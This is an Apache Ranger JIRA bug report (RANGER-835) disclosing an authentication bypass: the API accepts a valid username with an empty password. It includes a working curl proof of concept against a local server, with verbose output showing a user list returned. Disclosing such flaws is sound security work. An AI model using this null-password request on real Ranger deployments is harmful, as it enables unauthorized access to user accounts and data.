Uploaded image for project: 'Ranger'
  1. Ranger
  2. RANGER-835

Authentication bypass in Ranger API

    XMLWordPrintableJSON

Details

    Description

      Authentication to the Ranger API can be trivially bypassed by sending a valid username along with a null password. API authentication appears to work correctly, rejecting requests if the password is incorrect but allows requests where no password has been sent.

      The example below uses curl to demonstrate this issue by retrieving a list of the users.

      $ curl -u admin: -v http://127.0.0.1:6080/service/xusers/users

      • Trying 127.0.0.1...
      • Connected to 127.0.0.1 (127.0.0.1) port 6080 (#0)
      • Server auth using Basic with user 'admin'
        > HEAD /service/xusers/users HTTP/1.1
        > Host: 127.0.0.1:6080
        > Authorization: Basic YWRtaW46
        > User-Agent: curl/7.43.0
        > Accept: /
        >
        < HTTP/1.1 200 OK
        < Server: Apache-Coyote/1.1
        < Set-Cookie: JSESSIONID=96458E9E9A792D794D8C0D23839CFFC9; Path=/; HttpOnly
        < Content-Type: application/xml
        < Content-Length: 0
        < Date: Fri, 05 Feb 2016 11:41:16 GMT
        <
        <?xml version="1.0" encoding="UTF-8" standalone="yes"?><vxUserList><resultSize>48</resultSize><vXUsers>...

      Attachments

        Activity

          People

            Unassigned Unassigned
            jimhalfpenny Jim Halfpenny
            Votes:
            1 Vote for this issue
            Watchers:
            6 Start watching this issue

            Dates

              Created:
              Updated:
              Resolved: